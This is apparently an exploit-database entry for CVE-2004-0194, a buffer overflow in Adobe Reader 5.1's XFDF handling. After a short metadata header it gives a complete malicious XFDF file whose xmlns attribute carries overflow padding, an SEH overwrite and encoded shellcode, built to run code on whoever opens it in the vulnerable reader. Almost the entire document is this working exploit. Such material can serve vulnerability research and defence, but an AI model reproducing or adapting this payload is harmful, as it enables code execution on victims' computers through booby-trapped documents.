# Exploit Title: Adobe Reader 5.1 XFDF Buffer Overflow Vulnerability (SEH) |
# Google Dork: N/A or filtype ".xfdf" |
# Date: 04/01/2011 |
# Author: extraexploit@gmail.com<script type="text/javascript"> |
/* <![CDATA[ */ |
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})(); |
/* ]]> */ |
</script> / http://extraexploit.blogspot.com |
# Software Link: http://www.oldversion.com/download/acrobat51.exe |
# Version: Acrobat (formerly Adobe) Reader 5.1 |
# Tested on: XP SP3 |
# CVE : cve-2004-0194 |
# http://extraexploit.blogspot.com/2011/07/old-bug-for-new-job-cve-2004-0194.html |
<?xml version="1.0" encoding="ISO-8859-1"?> |
<xfdf xmlns="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAz AAUO<81>.AAAAAAAAAAAAAAAAAAAAAAAAAAT]ÚÞÙuô_WYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLZHK9GpC0GpQpK9IuTqN2PdNkQBTpLKCbTLLKV2EDNkCBQ8VoOGRjTfVQIoEaIPNLGLQqQlC2TlGPO1ZoVmC1XGKRL0V2QGLKRrR0LKG2GLC1ZpNkG0QhK5IPQdPJEQN0RpNkCxR8LKChQ0EQZsXcGLPINkVTNkVaIFEaIoP1O0LlIQZoTMC1KwEhIpPuIdGsCMIhEkQmQ4T5IrChNkQHVDEQICRFNkTLRkNkQHGlGqKcLKTDLKVaZpMYCtVDQ4QKCkQqCiQJRqKOM0QHQOPZNkGbZKNfQMRJEQLMLENYGpC0C0RpPhEaLKROOwKON5OKL0OEI2RvRHI6MEOMOmIoZuElTFCLEZOpIkIpQeEUOKCwGcCBPoRJGpQCIoXURCPaPlRCTnQuPxPeEPAA" xml:space="preserve"> |
<fields> |
<field name="Date of Birth"><value>01-01-1960</value></field> |
<field name="Your Name"><value>Mr. Customer</value></field> |
</fields> |
<ids original="FEBDB19E0CD32274C16CE13DCF244AD2" modified="5BE74DD4F607B7409DC03D600E466E12"/> |
</xfdf> |
Mirror: http://www.exploit-db.com/sploits/cve-2004-0194.xfdf.xfdf |